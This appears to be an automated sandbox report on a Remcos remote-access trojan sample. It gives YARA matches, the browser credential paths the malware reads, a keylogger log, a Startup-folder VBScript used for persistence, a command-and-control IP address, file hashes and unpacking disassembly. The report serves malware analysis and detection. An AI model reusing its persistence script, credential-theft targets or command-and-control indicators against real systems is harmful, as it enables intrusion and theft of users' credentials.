Source: Yara match | File source: 00000001.00000002.4156176304.0000000001058000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.4157121061.0000000003DDE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.4157009146.0000000003920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.4156339648.00000000010FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Allene.exe PID: 7132, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Allene.exe PID: 2872, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 1_2_0040B21B
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 1_2_0040B335
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: \key3.db 1_2_0040B335
Source: Allene.exe | Binary or memory string: WIN_81
Source: Allene.exe | Binary or memory string: WIN_XP
Source: Allene.exe | Binary or memory string: WIN_XPe
Source: Allene.exe | Binary or memory string: WIN_VISTA
Source: Allene.exe | Binary or memory string: WIN_7
Source: Allene.exe | Binary or memory string: WIN_8
Source: Allene.exe, 00000004.00000002.1919469392.0000000000684000.00000040.00000001.01000000.00000004.sdmp | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-R1T905
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-R1T905
Source: Yara match | File source: 4.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.Allene.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Allene.exe.3920000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Allene.exe.3920000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.Allene.exe.18b0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Allene.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.Allene.exe.18b0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1920045593.0000000001948000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.4156569703.00000000012B3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1919987718.00000000018B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1919363155.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.4156176304.0000000001058000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.4157121061.0000000003DDE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.4157009146.0000000003920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.4156339648.00000000010FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Allene.exe PID: 7132, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Allene.exe PID: 2872, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: cmd.exe 1_2_00405042
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008F6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_008F6283
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008F6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_008F6747
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_00646283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,1_2_00646283
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_00646747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,1_2_00646747
                MITRE ATT&CK Matrix (a number preceding a technique is the signature-count badge shown in the original matrix)

                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | 111 Scripting | 2 Valid Accounts | 2 Native API | 111 Scripting | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 11 Archive Collected Data | 11 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                Credentials | Domains | Default Accounts | 1 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 121 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 121 Input Capture | 2 Encrypted Channel | Exfiltration Over Bluetooth | 1 Defacement
                Email Addresses | DNS Server | Domain Accounts | 2 Service Execution | 2 Valid Accounts | 1 Bypass User Account Control | 21 Obfuscated Files or Information | 2 Credentials In Files | 1 System Service Discovery | SMB/Windows Admin Shares | 3 Clipboard Data | 1 Remote Access Software | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | 1 Windows Service | 2 Valid Accounts | 1 Software Packing | NTDS | 4 File and Directory Discovery | Distributed Component Object Model | Input Capture | 1 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | 2 Registry Run Keys / Startup Folder | 21 Access Token Manipulation | 1 DLL Side-Loading | LSA Secrets | 26 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 1 Windows Service | 1 Bypass User Account Control | Cached Domain Credentials | 131 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | 22 Process Injection | 1 Masquerading | DCSync | 1 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | 2 Registry Run Keys / Startup Folder | 2 Valid Accounts | Proc Filesystem | 2 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | 11 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 21 Access Token Manipulation | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 22 Process Injection | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
                Source | Detection | Scanner | Label | Link
                7056ZCiFdE.exe | 55% | ReversingLabs | Win32.Trojan.AutoitInject |
                7056ZCiFdE.exe | 67% | Virustotal | | Browse
                7056ZCiFdE.exe | 100% | Joe Sandbox ML | |

                Source | Detection | Scanner | Label | Link
                C:\Users\user\AppData\Local\Milburr\Allene.exe | 100% | Joe Sandbox ML | |
                C:\Users\user\AppData\Local\Milburr\Allene.exe | 55% | ReversingLabs | Win32.Trojan.AutoitInject |
                C:\Users\user\AppData\Local\Milburr\Allene.exe | 67% | Virustotal | | Browse

                No Antivirus matches
                No contacted domains info
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://geoplugin.net/json.gp | Allene.exe | false | | high
                http://geoplugin.net/json.gp/C | Allene.exe, 00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Allene.exe, 00000001.00000002.4157009146.0000000003920000.00000004.00001000.00020000.00000000.sdmp, Allene.exe, 00000004.00000002.1919987718.00000000018B0000.00000004.00001000.00020000.00000000.sdmp, Allene.exe, 00000004.00000002.1919363155.0000000000400000.00000040.00001000.00020000.00000000.sdmp | false | | high
                    IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                    192.210.150.26 | unknown | United States | | 36352 | AS-COLOCROSSINGUS | true
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1570884
                    Start date and time:2024-12-08 09:30:25 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 9m 30s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of new started processes analysed:8
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:7056ZCiFdE.exe
                    renamed because original name is a hash value
                    Original Sample Name:6f0604f8a16b94b61d714dfec11d0358.exe
                    Detection:MAL
                    Classification:mal100.rans.troj.spyw.expl.evad.winEXE@6/7@0/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 57
                    • Number of non-executed functions: 282
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes were analyzed, report is missing behavior information
                    • Report creation exceeded maximum time and may have missing disassembly code information
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    Time | Type | Description
                    03:31:57 | API Interceptor | 6353343x Sleep call for process: Allene.exe modified
                    08:31:27 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Allene.vbs
                    Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                    192.210.150.26 | uIarPolvHR.exe | Get hash | malicious | Remcos | Browse |
                    | IB9876789000.bat.exe | Get hash | malicious | Remcos | Browse |
                    | z49FACTURA-0987678.exe | Get hash | malicious | Remcos | Browse |
                    | FAT6789098700900.scr.exe | Get hash | malicious | Remcos | Browse |
                    | Rgh99876k7e.exe | Get hash | malicious | Remcos | Browse |
                    | SALKI098765R400.exe | Get hash | malicious | Remcos | Browse |
                    | FTE98767800000.bat.exe | Get hash | malicious | Remcos | Browse |
                                  No context
                                   Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                   AS-COLOCROSSINGUS | uIarPolvHR.exe | Get hash | malicious | Remcos | Browse | 192.210.150.26
                                   | IB9876789000.bat.exe | Get hash | malicious | Remcos | Browse | 192.210.150.26
                                   | meerkat.x86.elf | Get hash | malicious | Mirai | Browse | 104.168.61.38
                                   | CGDL.doc | Get hash | malicious | Unknown | Browse | 192.3.172.208
                                   | seemejkiss.hta | Get hash | malicious | Cobalt Strike, FormBook, HTMLPhisher | Browse | 107.175.113.196
                                   | seemybestdayguvenu.hta | Get hash | malicious | Cobalt Strike, FormBook, HTMLPhisher | Browse | 172.245.123.29
                                   | k4PAIh16E6.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 192.3.118.10
                                   | scan_241205-801_draft_PO.exe | Get hash | malicious | Remcos, GuLoader | Browse | 104.168.7.16
                                   | Transferencia de pago.xlam.xlsx | Get hash | malicious | AgentTesla | Browse | 192.3.243.136
                                   | LdSbZG1iH6.exe | Get hash | malicious | Remcos, PureLog Stealer | Browse | 192.3.64.152
                                  No context
                                  No context
                                  Process:C:\Users\user\AppData\Local\Milburr\Allene.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):204
                                  Entropy (8bit):3.3573372569087336
                                  Encrypted:false
                                  SSDEEP:3:rhlKlyK1uflfT5JWRal2Jl+7R0DAlBG45klovDl64oojklovDl6v:6lZEfp5YcIeeDAlOWA41gWAv
                                  MD5:CB176B70DAA2CC265D36380D483E945F
                                  SHA1:CDA860866DC427EF3FD6BF09234812931D8470AD
                                  SHA-256:309E1CA9340FF21BF92AB0216B9C6E45B4F61A43CA5A4EF636A508CE56D423D4
                                  SHA-512:29129381A9F3608C789E908DD1659F5CD9A0057485D789E550CF3E3D6C53BDAF0B1CCE8EDDFD02F031A0684089AC2335430AFCCF3A659F317D9F96F86211ACC2
                                  Malicious:true
                                  Yara Hits:
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                  Reputation:low
                                  Preview:....[.2.0.2.4./.1.2./.0.8. .0.3.:.3.1.:.2.5. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                  Process:C:\Users\user\Desktop\7056ZCiFdE.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                  Category:dropped
                                  Size (bytes):885760
                                  Entropy (8bit):7.96449026748468
                                  Encrypted:false
                                  SSDEEP:24576:drl6kD68JmlotQfAVnxag+/zxRlk4t4p5G5wJm1wr:Zl328U2yfAVnsgSWpg5km
                                  MD5:6F0604F8A16B94B61D714DFEC11D0358
                                  SHA1:558828C2EAD68EA5883655299A3F0BFAD1981AE5
                                  SHA-256:28331E2705BF58BD76A9F8BA0F0A431B762EAF6E4284DBF12F1453DD3FECF281
                                  SHA-512:76EBD74EC7B965FF20AAD25AA6C0DFC5B7EFEF087F6BD4BF6F0B2F08427AC65BF320305DB16FF00CEBC5BFC98C8F22014ED5E7C9CEDD37A05721B330326C4EB3
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 55%
                                  • Antivirus: Virustotal, Detection: 67%, Browse
                                  Reputation:low
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L....eRg.........."......`...0...0..P....@........@.......................................@...@.......@........................$...................................................................4...H...........................................UPX0.....0..............................UPX1.....`...@...^..................@....rsrc....0......."...b..............@..............................................................................................................................................................................................................................................................................................................................................................3.91.UPX!....
                                  Process:C:\Users\user\Desktop\7056ZCiFdE.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):492544
                                  Entropy (8bit):7.63343625326173
                                  Encrypted:false
                                  SSDEEP:12288:X2BF3zOqNhLkZUidJm1/Inj15y1KojPGdn:XuZviS1/v1Odn
                                  MD5:3CB6ABD40FBA1EDDD8A7DDA9994BA7F7
                                  SHA1:2C563FAD704A5E5407F38AFF2E47C72138944106
                                  SHA-256:4B2E35D8CD82164975B338E118EBFBD621D1AFB5E768A12936F7F9D0B6C1B9E0
                                  SHA-512:CA9C2B1DEAF0DA7DB93AD63CF98010EF28D5B07E50213984842996A14796AE88E774583F487510F1860CBDD5B58CF51523F928C8FDE6622F80352CAC6BA7B77F
                                  Malicious:false
                                  Reputation:low
                                  Preview:}..4D67BAUE5..0O.WU0RI4Gv7BEUE5NC0OMWU0RI4G67BEUE5NC0OMWU0RI<F67LZ.K5.J.n.V..s.\.E.27:"G/..,,9;_&iV".E7+u,[n...m::T7g9J<.BEUE5NC.f...x..........9.k.....<.c.T~.I.n.....g.......\.........................................\l......T.......]b...... W/....UE5NC0OM..0R.5B6\.a2E5NC0OMW.0PH?F8'B%PE5nA0OMWU.iJ4G&7BE%@5NCpOMGU0RK4G37CEUE5NF0NMWU0RI.@67FEUE5NC2OM.U0BI4W67BEEE5^C0OMWU RI4G67BEUE5n.6OIVU0R)3G..BEUE5NC0OMWU0RI4G67.BU..NC .KWm0RI4G67BEUE5NC0OMWU.O4_67B..C5.C0OMWU0RI4G6GGE.A5NC0OMWU0RI4G67BEUE5NC0OMW{D71@G67_.PE5^C0O-RU0VI4G67BEUE5NC0OmWUP|;P&BVBEU.4NC@JMW.1RIPB67BEUE5NC0OMW.0R..#WC#EUEY.C0OMPU0\I4G.1BEUE5NC0OMWU0.I4..E176E5N.xOMW57RI~G67.CUE5NC0OMWU0RItG6wl70)Z-C0.vWU0.N4G.7BE.B5NC0OMWU0RI4Gv7B.UE5NC0OMWU0RI4G67BEUE5NC0OMWU0RI4G67BEUE5NC0OMWU0RI4G67BEUE5NC0OMWU0RI4G67BEUE5NC0OMWU0RI4G67BEUE5NC0OMWU0RI4G67BEUE5NC0OMWU0RI4G67BEUE5NC0OMWU0RI4G67BEUE5NC0OMWU0RI4G67BEUE5NC0OMWU0RI4G67BEUE5NC0OMWU0RI4G67BEUE5NC0OMWU0RI4G67BEUE5NC0OMWU0RI4G67BEUE5NC0OMWU0RI4G67BEUE5NC0OMWU0RI4G67BEUE5
                                  Process:C:\Users\user\AppData\Local\Milburr\Allene.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):423980
                                  Entropy (8bit):7.985815089552733
                                  Encrypted:false
                                  SSDEEP:6144:25V/D8z7yiqubuaLDja6J0YeeJ50+YPJc043YBYc/B7k4vhozdky5ly26tqlrxuO:2z7il3Y7eJ5nYPJoYBTlkohOqakSlOK9
                                  MD5:CBDEE7E56FE6E632838A31ADF1435807
                                  SHA1:9AC24BD12E4369785742E075F81B9B6A50EBABBD
                                  SHA-256:DC44AEE08535CFCA123FE35EC2EE62E4D0457A82A370F709E6BDC95B9F26F11C
                                  SHA-512:E058194D24BCBB56638E3E63E0E50D2F4FA2A6956DC57EAAC73E11F215190940B5AB3744DF567FFE1A29B7D324422B3DED9E339E1188F910BBC6EC32496E72A9
                                  Malicious:false
                                  Reputation:low
                                  Preview:EA06......;3J$.oB..h.]..aO.....&iG.M.TP.2.C.S..y....s.4.oL.{.s_.+.n..?.v.....Sy../.D%....&..Qj,.Wu.V..{.r.:.U&.y.*y..L.2....o...2...~....5k.. .....c../..'.n.z!~........>.C.\.{...!...c....)..k.Y...+....M.....e@.,n...q..>....p.x.....p../^....q.........4u..L*PY..m\..f@....*....q'.Ij.Y.....B.4...L..Ih....M.......g7..h.i.8.w.J..oF....M..f.*L....h.Z...$.*.h...MX...........Ux..u.A....1.7c/O.W...nB.5.....G..h 9.m.7......j..1.mJ.0...|6.V.|..$.*....S.t.U6...5...g...T.1..^.#..+10.6.U.W...4..G..Rf.x..c7........5..7..#yC.....y...7.JkR...v..<T.....Gh@.?..a.........t.....!..[...)....W.|.s.L.m..R..Z.._u..e..J!..h.PZ..c:.P....J...f.{..Q.........D...._..P...ef.C.B.J..##.....,&..rk..[.......S]5..O.....'.Q.M(Q...p.L4.*.Va:.. Sn...V..1....Ki.L7T.%.m_.Jb.^..3..2....4..u4:,..X.r3...,...F~4..Wd..G....qm@.G.|..Rk..G."..kn .GB...[. .G2...........,....9b...r+3..B(......N..9...&(.....%..9. .&`...@..}..9.....&.rk..V..0....2i...(4Xf..b.L).YL..R..3Y.o.?..?.+.?KU.L
                                  Process:C:\Users\user\Desktop\7056ZCiFdE.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):423980
                                  Entropy (8bit):7.985815089552733
                                  Encrypted:false
                                  SSDEEP:6144:25V/D8z7yiqubuaLDja6J0YeeJ50+YPJc043YBYc/B7k4vhozdky5ly26tqlrxuO:2z7il3Y7eJ5nYPJoYBTlkohOqakSlOK9
                                  MD5:CBDEE7E56FE6E632838A31ADF1435807
                                  SHA1:9AC24BD12E4369785742E075F81B9B6A50EBABBD
                                  SHA-256:DC44AEE08535CFCA123FE35EC2EE62E4D0457A82A370F709E6BDC95B9F26F11C
                                  SHA-512:E058194D24BCBB56638E3E63E0E50D2F4FA2A6956DC57EAAC73E11F215190940B5AB3744DF567FFE1A29B7D324422B3DED9E339E1188F910BBC6EC32496E72A9
                                  Malicious:false
                                  Reputation:low
                                  Preview:EA06......;3J$.oB..h.]..aO.....&iG.M.TP.2.C.S..y....s.4.oL.{.s_.+.n..?.v.....Sy../.D%....&..Qj,.Wu.V..{.r.:.U&.y.*y..L.2....o...2...~....5k.. .....c../..'.n.z!~........>.C.\.{...!...c....)..k.Y...+....M.....e@.,n...q..>....p.x.....p../^....q.........4u..L*PY..m\..f@....*....q'.Ij.Y.....B.4...L..Ih....M.......g7..h.i.8.w.J..oF....M..f.*L....h.Z...$.*.h...MX...........Ux..u.A....1.7c/O.W...nB.5.....G..h 9.m.7......j..1.mJ.0...|6.V.|..$.*....S.t.U6...5...g...T.1..^.#..+10.6.U.W...4..G..Rf.x..c7........5..7..#yC.....y...7.JkR...v..<T.....Gh@.?..a.........t.....!..[...)....W.|.s.L.m..R..Z.._u..e..J!..h.PZ..c:.P....J...f.{..Q.........D...._..P...ef.C.B.J..##.....,&..rk..[.......S]5..O.....'.Q.M(Q...p.L4.*.Va:.. Sn...V..1....Ki.L7T.%.m_.Jb.^..3..2....4..u4:,..X.r3...,...F~4..Wd..G....qm@.G.|..Rk..G."..kn .GB...[. .G2...........,....9b...r+3..B(......N..9...&(.....%..9. .&`...@..}..9.....&.rk..V..0....2i...(4Xf..b.L).YL..R..3Y.o.?..?.+.?KU.L
                                  Process:C:\Users\user\AppData\Local\Milburr\Allene.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):423980
                                  Entropy (8bit):7.985815089552733
                                  Encrypted:false
                                  SSDEEP:6144:25V/D8z7yiqubuaLDja6J0YeeJ50+YPJc043YBYc/B7k4vhozdky5ly26tqlrxuO:2z7il3Y7eJ5nYPJoYBTlkohOqakSlOK9
                                  MD5:CBDEE7E56FE6E632838A31ADF1435807
                                  SHA1:9AC24BD12E4369785742E075F81B9B6A50EBABBD
                                  SHA-256:DC44AEE08535CFCA123FE35EC2EE62E4D0457A82A370F709E6BDC95B9F26F11C
                                  SHA-512:E058194D24BCBB56638E3E63E0E50D2F4FA2A6956DC57EAAC73E11F215190940B5AB3744DF567FFE1A29B7D324422B3DED9E339E1188F910BBC6EC32496E72A9
                                  Malicious:false
                                  Reputation:low
                                  Preview:EA06......;3J$.oB..h.]..aO.....&iG.M.TP.2.C.S..y....s.4.oL.{.s_.+.n..?.v.....Sy../.D%....&..Qj,.Wu.V..{.r.:.U&.y.*y..L.2....o...2...~....5k.. .....c../..'.n.z!~........>.C.\.{...!...c....)..k.Y...+....M.....e@.,n...q..>....p.x.....p../^....q.........4u..L*PY..m\..f@....*....q'.Ij.Y.....B.4...L..Ih....M.......g7..h.i.8.w.J..oF....M..f.*L....h.Z...$.*.h...MX...........Ux..u.A....1.7c/O.W...nB.5.....G..h 9.m.7......j..1.mJ.0...|6.V.|..$.*....S.t.U6...5...g...T.1..^.#..+10.6.U.W...4..G..Rf.x..c7........5..7..#yC.....y...7.JkR...v..<T.....Gh@.?..a.........t.....!..[...)....W.|.s.L.m..R..Z.._u..e..J!..h.PZ..c:.P....J...f.{..Q.........D...._..P...ef.C.B.J..##.....,&..rk..[.......S]5..O.....'.Q.M(Q...p.L4.*.Va:.. Sn...V..1....Ki.L7T.%.m_.Jb.^..3..2....4..u4:,..X.r3...,...F~4..Wd..G....qm@.G.|..Rk..G."..kn .GB...[. .G2...........,....9b...r+3..B(......N..9...&(.....%..9. .&`...@..}..9.....&.rk..V..0....2i...(4Xf..b.L).YL..R..3Y.o.?..?.+.?KU.L
                                  Process:C:\Users\user\AppData\Local\Milburr\Allene.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):268
                                  Entropy (8bit):3.3984013364689636
                                  Encrypted:false
                                  SSDEEP:6:DMM8lfm3OOQdUfcloRKUEZ+lX1olFgAD76nriIM8lfQVn:DsO+vNloRKQ1olvDcmA2n
                                  MD5:9ADBEDC65F332D0F3CB23DF19C449A76
                                  SHA1:C8BCEB35573CAB38C15BCF700483AD757ACB35CD
                                  SHA-256:CF46956B53F2A99BB538A9E6F04B3086ECDDE52A903B9ED61C9FDCF96E8E45C0
                                  SHA-512:593057C22675DCB5B372B93ACA759178339EFCEEA0DD68C6B03214CACE876BAA0FBCD7F6B7D79947B989D7011805E8BC5A23B6D1881F78641D9741A297455844
                                  Malicious:true
                                  Reputation:low
                                  Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.l.b.u.r.r.\.A.l.l.e.n.e...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...
                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                  Entropy (8bit):7.96449026748468
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.39%
                                  • UPX compressed Win32 Executable (30571/9) 0.30%
                                  • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  File name:7056ZCiFdE.exe
                                  File size:885'760 bytes
                                  MD5:6f0604f8a16b94b61d714dfec11d0358
                                  SHA1:558828c2ead68ea5883655299a3f0bfad1981ae5
                                  SHA256:28331e2705bf58bd76a9f8ba0f0a431b762eaf6e4284dbf12f1453dd3fecf281
                                  SHA512:76ebd74ec7b965ff20aad25aa6c0dfc5b7efef087f6bd4bf6f0b2f08427ac65bf320305db16ff00cebc5bfc98c8f22014ed5e7c9cedd37a05721b330326c4eb3
                                  SSDEEP:24576:drl6kD68JmlotQfAVnxag+/zxRlk4t4p5G5wJm1wr:Zl328U2yfAVnsgSWpg5km
                                  TLSH:99152352CDC1D923C9FD6B348036CD5009A93471AEA6272EC719E64FFC31347A85BB99
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                  Icon Hash:aaf3e3e3938382a0
                                  Entrypoint:0x559a50
                                  Entrypoint Section:UPX1
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x67526584 [Fri Dec 6 02:46:28 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:fc6683d30d9f25244a50fd5357825e79
                                  Instruction
                                  pushad
                                  mov esi, 00504000h
                                  lea edi, dword ptr [esi-00103000h]
                                  push edi
                                  jmp 00007F93651125ADh
                                  nop
                                  mov al, byte ptr [esi]
                                  inc esi
                                  mov byte ptr [edi], al
                                  inc edi
                                  add ebx, ebx
                                  jne 00007F93651125A9h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  jc 00007F936511258Fh
                                  mov eax, 00000001h
                                  add ebx, ebx
                                  jne 00007F93651125A9h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  adc eax, eax
                                  add ebx, ebx
                                  jnc 00007F93651125ADh
                                  jne 00007F93651125CAh
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  jc 00007F93651125C1h
                                  dec eax
                                  add ebx, ebx
